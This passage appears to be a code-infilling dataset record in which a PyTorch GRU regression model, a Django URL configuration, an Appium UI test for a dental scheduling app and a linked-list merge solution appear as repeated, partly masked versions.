shape[0], encoding_result.shape[1] * encoding_result.shape[2]])
seq_pred = self.decoder(encoding_result)
return seq_pred.squeeze(1)
def _loss_fn(self, seq_pred, target_seq):
return F.mse_loss(seq_pred, target_seq)
<|reserved_special_token_0|>
def infer_batch(self, input_seq, logger):
"""
model inference.
The given data can be in the form of batch or single isinstance
"""
return self.forward(input_seq, None)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Model(nn.Module):
def __init__(self, hidden_size, encoder_layer=2, step=4, is_bidir=False,
**kw):
super(Model, self).__init__()
fc_embedding = []
for i in range(int(math.log(hidden_size, step))):
fc_embedding.append(nn.Linear(int(math.pow(step, i)), int(math.
pow(step, i + 1))))
fc_embedding.append(nn.Linear(int(math.pow(step, int(math.log(
hidden_size, step)))), hidden_size))
self.fc_embedding = nn.Sequential(*fc_embedding)
self.encoder = nn.GRU(hidden_size, hidden_size, encoder_layer,
False, True, bidirectional=is_bidir)
self.decoder = nn.Sequential(nn.Linear(encoder_layer * (int(
is_bidir) + 1) * hidden_size, hidden_size), nn.Linear(
hidden_size, hidden_size // step), nn.Linear(hidden_size //
step, 1))
def forward(self, input_seq, target_seq=None):
input_seq = self.fc_embedding(input_seq.unsqueeze(-1))
_, encoding_result = self.encoder(input_seq)
encoding_result = torch.transpose(encoding_result, 0, 1).contiguous()
encoding_result = torch.reshape(encoding_result, [encoding_result.
shape[0], encoding_result.shape[1] * encoding_result.shape[2]])
seq_pred = self.decoder(encoding_result)
return seq_pred.squeeze(1)
def _loss_fn(self, seq_pred, target_seq):
return F.mse_loss(seq_pred, target_seq)
def train_batch(self, input_seq, target_seq, category, optimizer, logger):
"""
doc:
train the model with given data and optimizer, return log info
param:
input_seq: torch.LongTensor, [batch, max_seq_len]
target_seq: torch.LongTensor, [batch, max_seq_len]
optimizer: optimizer object
logger: logger object
"""
seq_pred = self.forward(input_seq, target_seq)
loss = self._loss_fn(seq_pred, target_seq)
optimizer.zero_grad()
loss.backward()
optimizer.step()
return loss.item(), seq_pred
def infer_batch(self, input_seq, logger):
"""
model inference.
The given data can be in the form of batch or single isinstance
"""
return self.forward(input_seq, None)
<|reserved_special_token_1|>
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
class Model(nn.Module):
def __init__(self, hidden_size, encoder_layer=2, step=4, is_bidir=False,
**kw):
super(Model, self).__init__()
fc_embedding = []
for i in range(int(math.log(hidden_size, step))):
fc_embedding.append(nn.Linear(int(math.pow(step, i)), int(math.
pow(step, i + 1))))
fc_embedding.append(nn.Linear(int(math.pow(step, int(math.log(
hidden_size, step)))), hidden_size))
self.fc_embedding = nn.Sequential(*fc_embedding)
self.encoder = nn.GRU(hidden_size, hidden_size, encoder_layer,
False, True, bidirectional=is_bidir)
self.decoder = nn.Sequential(nn.Linear(encoder_layer * (int(
is_bidir) + 1) * hidden_size, hidden_size), nn.Linear(
hidden_size, hidden_size // step), nn.Linear(hidden_size //
step, 1))
def forward(self, input_seq, target_seq=None):
input_seq = self.fc_embedding(input_seq.unsqueeze(-1))
_, encoding_result = self.encoder(input_seq)
encoding_result = torch.transpose(encoding_result, 0, 1).contiguous()
encoding_result = torch.reshape(encoding_result, [encoding_result.
shape[0], encoding_result.shape[1] * encoding_result.shape[2]])
seq_pred = self.decoder(encoding_result)
return seq_pred.squeeze(1)
def _loss_fn(self, seq_pred, target_seq):
return F.mse_loss(seq_pred, target_seq)
def train_batch(self, input_seq, target_seq, category, optimizer, logger):
"""
doc:
train the model with given data and optimizer, return log info
param:
input_seq: torch.LongTensor, [batch, max_seq_len]
target_seq: torch.LongTensor, [batch, max_seq_len]
optimizer: optimizer object
logger: logger object
"""
seq_pred = self.forward(input_seq, target_seq)
loss = self._loss_fn(seq_pred, target_seq)
optimizer.zero_grad()
loss.backward()
optimizer.step()
return loss.item(), seq_pred
def infer_batch(self, input_seq, logger):
"""
model inference.
The given data can be in the form of batch or single isinstance
"""
return self.forward(input_seq, None)
<|reserved_special_token_1|>
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
class Model(nn.Module):
def __init__(self, hidden_size, encoder_layer=2, step=4, is_bidir=False, **kw):
super(Model, self).__init__()
fc_embedding = []
# First, we should convert the 1 dim data to a higher dim
for i in range(int(math.log(hidden_size, step))):
fc_embedding.append(nn.Linear(int(math.pow(step, i)), int(math.pow(step, i + 1))))
fc_embedding.append(nn.Linear(int(math.pow(step, int(math.log(hidden_size, step)))), hidden_size))
self.fc_embedding = nn.Sequential(*fc_embedding)
self.encoder = nn.GRU(hidden_size, hidden_size, encoder_layer, False, True,
bidirectional=is_bidir)
self.decoder = nn.Sequential(
nn.Linear(encoder_layer * (int(is_bidir) + 1) * hidden_size, hidden_size),
nn.Linear(hidden_size, hidden_size // step),
nn.Linear(hidden_size // step, 1),
)
def forward(self, input_seq, target_seq=None):
input_seq = self.fc_embedding(input_seq.unsqueeze(-1))
_, encoding_result = self.encoder(input_seq)
encoding_result = torch.transpose(encoding_result, 0, 1).contiguous()
encoding_result = torch.reshape(encoding_result, [encoding_result.shape[0], encoding_result.shape[1] * encoding_result.shape[2]])
seq_pred = self.decoder(encoding_result)
return seq_pred.squeeze(1)
def _loss_fn(self, seq_pred, target_seq):
return F.mse_loss(seq_pred, target_seq)
def train_batch(self, input_seq, target_seq, category, optimizer, logger):
"""
doc:
train the model with given data and optimizer, return log info
param:
input_seq: torch.LongTensor, [batch, max_seq_len]
target_seq: torch.LongTensor, [batch, max_seq_len]
optimizer: optimizer object
logger: logger object
"""
seq_pred = self.forward(input_seq, target_seq)
loss = self._loss_fn(seq_pred, target_seq)
# optimize
optimizer.zero_grad()
loss.backward()
optimizer.step()
return loss.item(), seq_pred
def infer_batch(self, input_seq, logger):
"""
model inference.
The given data can be in the form of batch or single isinstance
"""
return self.forward(input_seq, None)
|
flexible
|
{
"blob_id": "188f82b0fb04d6814d77617fa9148113d0e6ef01",
"index": 2170,
"step-1": "<mask token>\n\n\nclass Model(nn.Module):\n <mask token>\n\n def forward(self, input_seq, target_seq=None):\n input_seq = self.fc_embedding(input_seq.unsqueeze(-1))\n _, encoding_result = self.encoder(input_seq)\n encoding_result = torch.transpose(encoding_result, 0, 1).contiguous()\n encoding_result = torch.reshape(encoding_result, [encoding_result.\n shape[0], encoding_result.shape[1] * encoding_result.shape[2]])\n seq_pred = self.decoder(encoding_result)\n return seq_pred.squeeze(1)\n\n def _loss_fn(self, seq_pred, target_seq):\n return F.mse_loss(seq_pred, target_seq)\n <mask token>\n\n def infer_batch(self, input_seq, logger):\n \"\"\"\n model inference.\n The given data can be in the form of batch or single isinstance\n \"\"\"\n return self.forward(input_seq, None)\n",
"step-2": "<mask token>\n\n\nclass Model(nn.Module):\n\n def __init__(self, hidden_size, encoder_layer=2, step=4, is_bidir=False,\n **kw):\n super(Model, self).__init__()\n fc_embedding = []\n for i in range(int(math.log(hidden_size, step))):\n fc_embedding.append(nn.Linear(int(math.pow(step, i)), int(math.\n pow(step, i + 1))))\n fc_embedding.append(nn.Linear(int(math.pow(step, int(math.log(\n hidden_size, step)))), hidden_size))\n self.fc_embedding = nn.Sequential(*fc_embedding)\n self.encoder = nn.GRU(hidden_size, hidden_size, encoder_layer, \n False, True, bidirectional=is_bidir)\n self.decoder = nn.Sequential(nn.Linear(encoder_layer * (int(\n is_bidir) + 1) * hidden_size, hidden_size), nn.Linear(\n hidden_size, hidden_size // step), nn.Linear(hidden_size //\n step, 1))\n\n def forward(self, input_seq, target_seq=None):\n input_seq = self.fc_embedding(input_seq.unsqueeze(-1))\n _, encoding_result = self.encoder(input_seq)\n encoding_result = torch.transpose(encoding_result, 0, 1).contiguous()\n encoding_result = torch.reshape(encoding_result, [encoding_result.\n shape[0], encoding_result.shape[1] * encoding_result.shape[2]])\n seq_pred = self.decoder(encoding_result)\n return seq_pred.squeeze(1)\n\n def _loss_fn(self, seq_pred, target_seq):\n return F.mse_loss(seq_pred, target_seq)\n <mask token>\n\n def infer_batch(self, input_seq, logger):\n \"\"\"\n model inference.\n The given data can be in the form of batch or single isinstance\n \"\"\"\n return self.forward(input_seq, None)\n",
"step-3": "<mask token>\n\n\nclass Model(nn.Module):\n\n def __init__(self, hidden_size, encoder_layer=2, step=4, is_bidir=False,\n **kw):\n super(Model, self).__init__()\n fc_embedding = []\n for i in range(int(math.log(hidden_size, step))):\n fc_embedding.append(nn.Linear(int(math.pow(step, i)), int(math.\n pow(step, i + 1))))\n fc_embedding.append(nn.Linear(int(math.pow(step, int(math.log(\n hidden_size, step)))), hidden_size))\n self.fc_embedding = nn.Sequential(*fc_embedding)\n self.encoder = nn.GRU(hidden_size, hidden_size, encoder_layer, \n False, True, bidirectional=is_bidir)\n self.decoder = nn.Sequential(nn.Linear(encoder_layer * (int(\n is_bidir) + 1) * hidden_size, hidden_size), nn.Linear(\n hidden_size, hidden_size // step), nn.Linear(hidden_size //\n step, 1))\n\n def forward(self, input_seq, target_seq=None):\n input_seq = self.fc_embedding(input_seq.unsqueeze(-1))\n _, encoding_result = self.encoder(input_seq)\n encoding_result = torch.transpose(encoding_result, 0, 1).contiguous()\n encoding_result = torch.reshape(encoding_result, [encoding_result.\n shape[0], encoding_result.shape[1] * encoding_result.shape[2]])\n seq_pred = self.decoder(encoding_result)\n return seq_pred.squeeze(1)\n\n def _loss_fn(self, seq_pred, target_seq):\n return F.mse_loss(seq_pred, target_seq)\n\n def train_batch(self, input_seq, target_seq, category, optimizer, logger):\n \"\"\"\n doc:\n train the model with given data and optimizer, return log info\n param:\n input_seq: torch.LongTensor, [batch, max_seq_len]\n target_seq: torch.LongTensor, [batch, max_seq_len]\n optimizer: optimizer object\n logger: logger object\n \"\"\"\n seq_pred = self.forward(input_seq, target_seq)\n loss = self._loss_fn(seq_pred, target_seq)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n return loss.item(), seq_pred\n\n def infer_batch(self, input_seq, logger):\n \"\"\"\n model inference.\n The given data can be in the form of batch or single isinstance\n \"\"\"\n return 
self.forward(input_seq, None)\n",
"step-4": "import math\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass Model(nn.Module):\n\n def __init__(self, hidden_size, encoder_layer=2, step=4, is_bidir=False,\n **kw):\n super(Model, self).__init__()\n fc_embedding = []\n for i in range(int(math.log(hidden_size, step))):\n fc_embedding.append(nn.Linear(int(math.pow(step, i)), int(math.\n pow(step, i + 1))))\n fc_embedding.append(nn.Linear(int(math.pow(step, int(math.log(\n hidden_size, step)))), hidden_size))\n self.fc_embedding = nn.Sequential(*fc_embedding)\n self.encoder = nn.GRU(hidden_size, hidden_size, encoder_layer, \n False, True, bidirectional=is_bidir)\n self.decoder = nn.Sequential(nn.Linear(encoder_layer * (int(\n is_bidir) + 1) * hidden_size, hidden_size), nn.Linear(\n hidden_size, hidden_size // step), nn.Linear(hidden_size //\n step, 1))\n\n def forward(self, input_seq, target_seq=None):\n input_seq = self.fc_embedding(input_seq.unsqueeze(-1))\n _, encoding_result = self.encoder(input_seq)\n encoding_result = torch.transpose(encoding_result, 0, 1).contiguous()\n encoding_result = torch.reshape(encoding_result, [encoding_result.\n shape[0], encoding_result.shape[1] * encoding_result.shape[2]])\n seq_pred = self.decoder(encoding_result)\n return seq_pred.squeeze(1)\n\n def _loss_fn(self, seq_pred, target_seq):\n return F.mse_loss(seq_pred, target_seq)\n\n def train_batch(self, input_seq, target_seq, category, optimizer, logger):\n \"\"\"\n doc:\n train the model with given data and optimizer, return log info\n param:\n input_seq: torch.LongTensor, [batch, max_seq_len]\n target_seq: torch.LongTensor, [batch, max_seq_len]\n optimizer: optimizer object\n logger: logger object\n \"\"\"\n seq_pred = self.forward(input_seq, target_seq)\n loss = self._loss_fn(seq_pred, target_seq)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n return loss.item(), seq_pred\n\n def infer_batch(self, input_seq, logger):\n \"\"\"\n model inference.\n The given data can be in 
the form of batch or single isinstance\n \"\"\"\n return self.forward(input_seq, None)\n",
"step-5": "import math\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\n\r\n\r\nclass Model(nn.Module):\r\n\r\n def __init__(self, hidden_size, encoder_layer=2, step=4, is_bidir=False, **kw):\r\n super(Model, self).__init__()\r\n fc_embedding = []\r\n\r\n # First, we should convert the 1 dim data to a higher dim\r\n for i in range(int(math.log(hidden_size, step))):\r\n fc_embedding.append(nn.Linear(int(math.pow(step, i)), int(math.pow(step, i + 1))))\r\n fc_embedding.append(nn.Linear(int(math.pow(step, int(math.log(hidden_size, step)))), hidden_size))\r\n self.fc_embedding = nn.Sequential(*fc_embedding)\r\n self.encoder = nn.GRU(hidden_size, hidden_size, encoder_layer, False, True,\r\n bidirectional=is_bidir)\r\n\r\n self.decoder = nn.Sequential(\r\n nn.Linear(encoder_layer * (int(is_bidir) + 1) * hidden_size, hidden_size),\r\n nn.Linear(hidden_size, hidden_size // step),\r\n nn.Linear(hidden_size // step, 1),\r\n )\r\n\r\n def forward(self, input_seq, target_seq=None):\r\n input_seq = self.fc_embedding(input_seq.unsqueeze(-1))\r\n _, encoding_result = self.encoder(input_seq)\r\n encoding_result = torch.transpose(encoding_result, 0, 1).contiguous()\r\n encoding_result = torch.reshape(encoding_result, [encoding_result.shape[0], encoding_result.shape[1] * encoding_result.shape[2]])\r\n seq_pred = self.decoder(encoding_result)\r\n return seq_pred.squeeze(1)\r\n\r\n def _loss_fn(self, seq_pred, target_seq):\r\n return F.mse_loss(seq_pred, target_seq)\r\n\r\n def train_batch(self, input_seq, target_seq, category, optimizer, logger):\r\n \"\"\"\r\n doc:\r\n train the model with given data and optimizer, return log info\r\n param:\r\n input_seq: torch.LongTensor, [batch, max_seq_len]\r\n target_seq: torch.LongTensor, [batch, max_seq_len]\r\n optimizer: optimizer object\r\n logger: logger object\r\n \"\"\"\r\n seq_pred = self.forward(input_seq, target_seq)\r\n loss = self._loss_fn(seq_pred, target_seq)\r\n\r\n # optimize\r\n 
optimizer.zero_grad()\r\n loss.backward()\r\n optimizer.step()\r\n\r\n return loss.item(), seq_pred\r\n\r\n def infer_batch(self, input_seq, logger):\r\n \"\"\"\r\n model inference.\r\n The given data can be in the form of batch or single isinstance\r\n \"\"\"\r\n return self.forward(input_seq, None)\r\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
from django.conf.urls import url
from .views import LoginView, logout_user, delete_user
from .views import NewUserView
urlpatterns = [
url(r'newuser/', NewUserView.as_view(), name='newuser'),
url(r'login/', LoginView.as_view(), name='login'),
url(r'logout/', logout_user, name='logout'),
url(r'delete/$', delete_user, name='deleteuser'),
]
|
normal
|
{
"blob_id": "9b4bc7f8f9c96f503a5ed79827430963e21718c4",
"index": 3733,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns = [url('newuser/', NewUserView.as_view(), name='newuser'), url(\n 'login/', LoginView.as_view(), name='login'), url('logout/',\n logout_user, name='logout'), url('delete/$', delete_user, name=\n 'deleteuser')]\n",
"step-3": "from django.conf.urls import url\nfrom .views import LoginView, logout_user, delete_user\nfrom .views import NewUserView\nurlpatterns = [url('newuser/', NewUserView.as_view(), name='newuser'), url(\n 'login/', LoginView.as_view(), name='login'), url('logout/',\n logout_user, name='logout'), url('delete/$', delete_user, name=\n 'deleteuser')]\n",
"step-4": "from django.conf.urls import url\nfrom .views import LoginView, logout_user, delete_user\nfrom .views import NewUserView\n\nurlpatterns = [\n url(r'newuser/', NewUserView.as_view(), name='newuser'),\n url(r'login/', LoginView.as_view(), name='login'),\n url(r'logout/', logout_user, name='logout'),\n url(r'delete/$', delete_user, name='deleteuser'),\n]\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
def scheduleMultipoint(driver):
driver.find_element_by_id('com.dentist.android:id/calendarBt').click()
driver.find_element_by_id('com.dentist.android:id/addIb').click()
def time(driver):
driver.find_element_by_id('com.dentist.android:id/cureHourLl').click()
driver.find_element_by_name('23:00').click()
driver.find_element_by_name('00').click()
driver.find_element_by_name('15分钟').click()
driver.find_element_by_name('完成').click()
def data(driver):
driver.find_element_by_id('com.dentist.android:id/cureDayLl').click()
driver.find_element_by_name('完成').click()
def patient(driver):
driver.find_element_by_id('com.dentist.android:id/patientLl').click()
driver.find_element_by_name('总校').click()
driver.find_element_by_name('总校').click()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def scheduleMultipoint(driver):
driver.find_element_by_id('com.dentist.android:id/calendarBt').click()
driver.find_element_by_id('com.dentist.android:id/addIb').click()
def time(driver):
driver.find_element_by_id('com.dentist.android:id/cureHourLl').click()
driver.find_element_by_name('23:00').click()
driver.find_element_by_name('00').click()
driver.find_element_by_name('15分钟').click()
driver.find_element_by_name('完成').click()
def data(driver):
driver.find_element_by_id('com.dentist.android:id/cureDayLl').click()
driver.find_element_by_name('完成').click()
def patient(driver):
driver.find_element_by_id('com.dentist.android:id/patientLl').click()
driver.find_element_by_name('总校').click()
driver.find_element_by_name('总校').click()
def site(driver):
driver.find_element_by_id('com.dentist.android:id/moreLocLl').click()
driver.find_element_by_id('com.dentist.android:id/select_city_layout'
).click()
driver.find_element_by_name('北京市').click()
driver.find_element_by_name('返回').click()
driver.find_element_by_name('欢乐口腔(华贸分院)').click()
<|reserved_special_token_0|>
def subscribe(driver):
patient(driver)
data(driver)
time(driver)
site(driver)
project(driver)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def scheduleMultipoint(driver):
driver.find_element_by_id('com.dentist.android:id/calendarBt').click()
driver.find_element_by_id('com.dentist.android:id/addIb').click()
def time(driver):
driver.find_element_by_id('com.dentist.android:id/cureHourLl').click()
driver.find_element_by_name('23:00').click()
driver.find_element_by_name('00').click()
driver.find_element_by_name('15分钟').click()
driver.find_element_by_name('完成').click()
def data(driver):
driver.find_element_by_id('com.dentist.android:id/cureDayLl').click()
driver.find_element_by_name('完成').click()
def patient(driver):
driver.find_element_by_id('com.dentist.android:id/patientLl').click()
driver.find_element_by_name('总校').click()
driver.find_element_by_name('总校').click()
def site(driver):
driver.find_element_by_id('com.dentist.android:id/moreLocLl').click()
driver.find_element_by_id('com.dentist.android:id/select_city_layout'
).click()
driver.find_element_by_name('北京市').click()
driver.find_element_by_name('返回').click()
driver.find_element_by_name('欢乐口腔(华贸分院)').click()
def project(driver):
driver.find_element_by_name('牙位/治疗项目').click()
driver.find_element_by_name('修复').click()
driver.find_element_by_name('备牙').click()
driver.find_element_by_name('保存').click()
swipe.swipeUp(driver)
driver.find_element_by_name('发起预约').click()
driver.find_element_by_name('继续保存').click()
def subscribe(driver):
patient(driver)
data(driver)
time(driver)
site(driver)
project(driver)
<|reserved_special_token_1|>
import swipe
def scheduleMultipoint(driver):
driver.find_element_by_id('com.dentist.android:id/calendarBt').click()
driver.find_element_by_id('com.dentist.android:id/addIb').click()
def time(driver):
driver.find_element_by_id('com.dentist.android:id/cureHourLl').click()
driver.find_element_by_name('23:00').click()
driver.find_element_by_name('00').click()
driver.find_element_by_name('15分钟').click()
driver.find_element_by_name('完成').click()
def data(driver):
driver.find_element_by_id('com.dentist.android:id/cureDayLl').click()
driver.find_element_by_name('完成').click()
def patient(driver):
driver.find_element_by_id('com.dentist.android:id/patientLl').click()
driver.find_element_by_name('总校').click()
driver.find_element_by_name('总校').click()
def site(driver):
driver.find_element_by_id('com.dentist.android:id/moreLocLl').click()
driver.find_element_by_id('com.dentist.android:id/select_city_layout'
).click()
driver.find_element_by_name('北京市').click()
driver.find_element_by_name('返回').click()
driver.find_element_by_name('欢乐口腔(华贸分院)').click()
def project(driver):
driver.find_element_by_name('牙位/治疗项目').click()
driver.find_element_by_name('修复').click()
driver.find_element_by_name('备牙').click()
driver.find_element_by_name('保存').click()
swipe.swipeUp(driver)
driver.find_element_by_name('发起预约').click()
driver.find_element_by_name('继续保存').click()
def subscribe(driver):
patient(driver)
data(driver)
time(driver)
site(driver)
project(driver)
<|reserved_special_token_1|>
import swipe
def scheduleMultipoint(driver):
driver.find_element_by_id('com.dentist.android:id/calendarBt').click()
driver.find_element_by_id('com.dentist.android:id/addIb').click()
def time(driver):#就诊时间
driver.find_element_by_id('com.dentist.android:id/cureHourLl').click()#就诊时间
driver.find_element_by_name('23:00').click()#时间
driver.find_element_by_name('00').click()#分钟
driver.find_element_by_name('15分钟').click()#时长
driver.find_element_by_name('完成').click()
def data(driver):#就诊日期
driver.find_element_by_id('com.dentist.android:id/cureDayLl').click()#就诊日期
driver.find_element_by_name('完成').click()
def patient(driver):#患者
driver.find_element_by_id('com.dentist.android:id/patientLl').click()
#driver.find_element_by_id('com.dentist.android:id/layout_search').send_keys('总校')
#driver.find_element_by_id('com.dentist.android:id/contactLl').click()
driver.find_element_by_name('总校').click()
driver.find_element_by_name('总校').click()
def site(driver):#就诊地点
driver.find_element_by_id('com.dentist.android:id/moreLocLl').click()#选择就诊地点
driver.find_element_by_id('com.dentist.android:id/select_city_layout').click()
driver.find_element_by_name('北京市').click()
driver.find_element_by_name('返回').click()
driver.find_element_by_name('欢乐口腔(华贸分院)').click()
def project(driver):#治疗项目
driver.find_element_by_name('牙位/治疗项目').click()
driver.find_element_by_name('修复').click()
driver.find_element_by_name('备牙').click()
driver.find_element_by_name('保存').click()
swipe.swipeUp(driver)
driver.find_element_by_name('发起预约').click()
driver.find_element_by_name('继续保存').click()
def subscribe(driver):
patient(driver)
data(driver)
time(driver)
site(driver)
project(driver)
|
flexible
|
{
"blob_id": "02bc97b963b970993fc947cfa41c73230dd4d9e4",
"index": 2649,
"step-1": "<mask token>\n\n\ndef scheduleMultipoint(driver):\n driver.find_element_by_id('com.dentist.android:id/calendarBt').click()\n driver.find_element_by_id('com.dentist.android:id/addIb').click()\n\n\ndef time(driver):\n driver.find_element_by_id('com.dentist.android:id/cureHourLl').click()\n driver.find_element_by_name('23:00').click()\n driver.find_element_by_name('00').click()\n driver.find_element_by_name('15分钟').click()\n driver.find_element_by_name('完成').click()\n\n\ndef data(driver):\n driver.find_element_by_id('com.dentist.android:id/cureDayLl').click()\n driver.find_element_by_name('完成').click()\n\n\ndef patient(driver):\n driver.find_element_by_id('com.dentist.android:id/patientLl').click()\n driver.find_element_by_name('总校').click()\n driver.find_element_by_name('总校').click()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef scheduleMultipoint(driver):\n driver.find_element_by_id('com.dentist.android:id/calendarBt').click()\n driver.find_element_by_id('com.dentist.android:id/addIb').click()\n\n\ndef time(driver):\n driver.find_element_by_id('com.dentist.android:id/cureHourLl').click()\n driver.find_element_by_name('23:00').click()\n driver.find_element_by_name('00').click()\n driver.find_element_by_name('15分钟').click()\n driver.find_element_by_name('完成').click()\n\n\ndef data(driver):\n driver.find_element_by_id('com.dentist.android:id/cureDayLl').click()\n driver.find_element_by_name('完成').click()\n\n\ndef patient(driver):\n driver.find_element_by_id('com.dentist.android:id/patientLl').click()\n driver.find_element_by_name('总校').click()\n driver.find_element_by_name('总校').click()\n\n\ndef site(driver):\n driver.find_element_by_id('com.dentist.android:id/moreLocLl').click()\n driver.find_element_by_id('com.dentist.android:id/select_city_layout'\n ).click()\n driver.find_element_by_name('北京市').click()\n driver.find_element_by_name('返回').click()\n driver.find_element_by_name('欢乐口腔(华贸分院)').click()\n\n\n<mask token>\n\n\ndef subscribe(driver):\n patient(driver)\n data(driver)\n time(driver)\n site(driver)\n project(driver)\n",
"step-3": "<mask token>\n\n\ndef scheduleMultipoint(driver):\n driver.find_element_by_id('com.dentist.android:id/calendarBt').click()\n driver.find_element_by_id('com.dentist.android:id/addIb').click()\n\n\ndef time(driver):\n driver.find_element_by_id('com.dentist.android:id/cureHourLl').click()\n driver.find_element_by_name('23:00').click()\n driver.find_element_by_name('00').click()\n driver.find_element_by_name('15分钟').click()\n driver.find_element_by_name('完成').click()\n\n\ndef data(driver):\n driver.find_element_by_id('com.dentist.android:id/cureDayLl').click()\n driver.find_element_by_name('完成').click()\n\n\ndef patient(driver):\n driver.find_element_by_id('com.dentist.android:id/patientLl').click()\n driver.find_element_by_name('总校').click()\n driver.find_element_by_name('总校').click()\n\n\ndef site(driver):\n driver.find_element_by_id('com.dentist.android:id/moreLocLl').click()\n driver.find_element_by_id('com.dentist.android:id/select_city_layout'\n ).click()\n driver.find_element_by_name('北京市').click()\n driver.find_element_by_name('返回').click()\n driver.find_element_by_name('欢乐口腔(华贸分院)').click()\n\n\ndef project(driver):\n driver.find_element_by_name('牙位/治疗项目').click()\n driver.find_element_by_name('修复').click()\n driver.find_element_by_name('备牙').click()\n driver.find_element_by_name('保存').click()\n swipe.swipeUp(driver)\n driver.find_element_by_name('发起预约').click()\n driver.find_element_by_name('继续保存').click()\n\n\ndef subscribe(driver):\n patient(driver)\n data(driver)\n time(driver)\n site(driver)\n project(driver)\n",
"step-4": "import swipe\n\n\ndef scheduleMultipoint(driver):\n driver.find_element_by_id('com.dentist.android:id/calendarBt').click()\n driver.find_element_by_id('com.dentist.android:id/addIb').click()\n\n\ndef time(driver):\n driver.find_element_by_id('com.dentist.android:id/cureHourLl').click()\n driver.find_element_by_name('23:00').click()\n driver.find_element_by_name('00').click()\n driver.find_element_by_name('15分钟').click()\n driver.find_element_by_name('完成').click()\n\n\ndef data(driver):\n driver.find_element_by_id('com.dentist.android:id/cureDayLl').click()\n driver.find_element_by_name('完成').click()\n\n\ndef patient(driver):\n driver.find_element_by_id('com.dentist.android:id/patientLl').click()\n driver.find_element_by_name('总校').click()\n driver.find_element_by_name('总校').click()\n\n\ndef site(driver):\n driver.find_element_by_id('com.dentist.android:id/moreLocLl').click()\n driver.find_element_by_id('com.dentist.android:id/select_city_layout'\n ).click()\n driver.find_element_by_name('北京市').click()\n driver.find_element_by_name('返回').click()\n driver.find_element_by_name('欢乐口腔(华贸分院)').click()\n\n\ndef project(driver):\n driver.find_element_by_name('牙位/治疗项目').click()\n driver.find_element_by_name('修复').click()\n driver.find_element_by_name('备牙').click()\n driver.find_element_by_name('保存').click()\n swipe.swipeUp(driver)\n driver.find_element_by_name('发起预约').click()\n driver.find_element_by_name('继续保存').click()\n\n\ndef subscribe(driver):\n patient(driver)\n data(driver)\n time(driver)\n site(driver)\n project(driver)\n",
"step-5": "import swipe\ndef scheduleMultipoint(driver):\n driver.find_element_by_id('com.dentist.android:id/calendarBt').click()\n driver.find_element_by_id('com.dentist.android:id/addIb').click()\n\n\ndef time(driver):#就诊时间\n driver.find_element_by_id('com.dentist.android:id/cureHourLl').click()#就诊时间\n driver.find_element_by_name('23:00').click()#时间\n driver.find_element_by_name('00').click()#分钟\n driver.find_element_by_name('15分钟').click()#时长\n driver.find_element_by_name('完成').click()\n\ndef data(driver):#就诊日期\n driver.find_element_by_id('com.dentist.android:id/cureDayLl').click()#就诊日期\n driver.find_element_by_name('完成').click()\n\ndef patient(driver):#患者\n driver.find_element_by_id('com.dentist.android:id/patientLl').click()\n #driver.find_element_by_id('com.dentist.android:id/layout_search').send_keys('总校')\n #driver.find_element_by_id('com.dentist.android:id/contactLl').click()\n driver.find_element_by_name('总校').click()\n driver.find_element_by_name('总校').click()\ndef site(driver):#就诊地点\n driver.find_element_by_id('com.dentist.android:id/moreLocLl').click()#选择就诊地点\n driver.find_element_by_id('com.dentist.android:id/select_city_layout').click()\n driver.find_element_by_name('北京市').click()\n driver.find_element_by_name('返回').click()\n driver.find_element_by_name('欢乐口腔(华贸分院)').click()\ndef project(driver):#治疗项目\n driver.find_element_by_name('牙位/治疗项目').click()\n driver.find_element_by_name('修复').click()\n driver.find_element_by_name('备牙').click()\n driver.find_element_by_name('保存').click()\n swipe.swipeUp(driver)\n driver.find_element_by_name('发起预约').click()\n driver.find_element_by_name('继续保存').click()\n\ndef subscribe(driver):\n patient(driver)\n data(driver)\n time(driver)\n site(driver)\n project(driver)\n\n\n\n",
"step-ids": [
4,
6,
7,
8,
9
]
}
|
[
4,
6,
7,
8,
9
] |
<|reserved_special_token_0|>
class ListNode:
def __init__(self, val=0, next=None):
self.val = val
self.next = next
class Solution:
def mergeTwoLists(self, l1: ListNode, l2: ListNode) ->ListNode:
ret = itr = ListNode(-sys.maxsize)
while l1 and l2:
v1 = l1.val
v2 = l2.val
if v1 <= v2:
itr.next = ListNode(v1)
l1 = l1.next
else:
itr.next = ListNode(v2)
l2 = l2.next
itr = itr.next
if l1:
itr.next = l1
if l2:
itr.next = l2
return ret.next
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ListNode:
def __init__(self, val=0, next=None):
self.val = val
self.next = next
class Solution:
def mergeTwoLists(self, l1: ListNode, l2: ListNode) ->ListNode:
ret = itr = ListNode(-sys.maxsize)
while l1 and l2:
v1 = l1.val
v2 = l2.val
if v1 <= v2:
itr.next = ListNode(v1)
l1 = l1.next
else:
itr.next = ListNode(v2)
l2 = l2.next
itr = itr.next
if l1:
itr.next = l1
if l2:
itr.next = l2
return ret.next
def make_list(_l: List):
head = ListNode(_l[0])
itr = head
for val in _l[1:]:
node = ListNode(val)
itr.next = node
itr = node
return head
def print_list(l: ListNode):
itr = l
while itr:
print(itr.val, end=' ')
itr = itr.next
print()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ListNode:
def __init__(self, val=0, next=None):
self.val = val
self.next = next
class Solution:
def mergeTwoLists(self, l1: ListNode, l2: ListNode) ->ListNode:
ret = itr = ListNode(-sys.maxsize)
while l1 and l2:
v1 = l1.val
v2 = l2.val
if v1 <= v2:
itr.next = ListNode(v1)
l1 = l1.next
else:
itr.next = ListNode(v2)
l2 = l2.next
itr = itr.next
if l1:
itr.next = l1
if l2:
itr.next = l2
return ret.next
